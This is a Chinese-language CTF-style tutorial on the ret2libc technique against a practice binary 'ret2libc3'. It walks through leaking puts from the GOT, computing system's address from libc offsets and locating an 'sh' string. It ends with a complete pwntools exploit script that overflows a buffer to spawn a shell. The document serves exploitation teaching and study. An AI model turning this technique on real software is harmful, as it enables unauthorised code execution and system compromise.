ret2libc--ROP(pwn)漏洞入门分析

背景知识

fflush 函数，清理缓冲区。

fflush(stdout) 一次性输出以上缓冲区所有数据

read(0,&buf,0xAu) 0代表标准输入，标准输出1，标准错误2，&buf 向buf输入。输入 长度为A的值的长度,数据类型U代表的是无符int

strtol(&buf,v3,v4) 是将输入的数据的ASCII码转换成数值存入 buf 中去

在read 中接受的是ascii码，所以使用python方法应该是 io.send(str('某个地址'))

使用got 查看运行的GOt 表中的信息

其中0x80 开始的就是未加载的表象地址。而0xf 开始一般都是libc中的地址



由上图可以看出，在 plt 中无 system 函数

利用查找字符串也未发现 /bin/sh

构建shell思路

当调试的时候查询到 puts 函数的时候，因为在 libc 中是固定的， 所以system 相对于puts 的位置是固定的，得到了puts 的地址加上偏移量即可获得system 地址

libc=ELF('./libc-2.23.so')

libc.symbols["system"] //获取方法和获取当前变量一样

libc.symbols["puts"]

同样也可以使用ida进行获取

puts



相差的绝对值为 system - puts =

获取 puts 的 Got 地址。

---

from pwn import *

io=process('./ret2libc3')

elf=ELF('./ret2libc3')

elf.got['puts']

---

获得elf中put的 puts 地址 134520860

将该值传到服务器(这里是本地进程)

See_something 函数获取put在远程（这里是本地测试）的地址。



地址为0xf7daecd0 以 f7 开头的一般都是 libc 地址

获取sh 地址

获取到fflush 存储的地址，读取由sh开始的地址，当读取完sh 就会读取到 %00 。

即可完成字符串sh 的读取

netx(elf.search(b"sh\0x00"))

利用链

在复制过程中 src 的内容过长（0x100），导致 dest 之外的内容被覆盖。

src 内容来自于用户输入。

(注:默认情况下使用的libc文件为本机文件，使用ldd ret2libc3 -v查看相关信息)

payload

---

from pwn import *

io=process("./ret2libc3")

elf=ELF("./ret2libc3.1")

libc3=ELF("/lib/i386-linux-gnu/libc.so.6")

io.sendlineafter(" :",str(elf.got["puts"]))

io.recvuntil(b' : ')

puts_addr=int(io.recvuntil(b'\n',drop=True),16)

base_addr=libc3.symbols["system"]-libc3.symbols["puts"]

print(base_addr)

payload=flat(cyclic(60),puts_addr+base_addr,0xdeadbeef,next(elf.search(b"sh\x00")))

print(payload)

io.sendlineafter(b" :",payload)

print(io.recv())

io.interactive()

---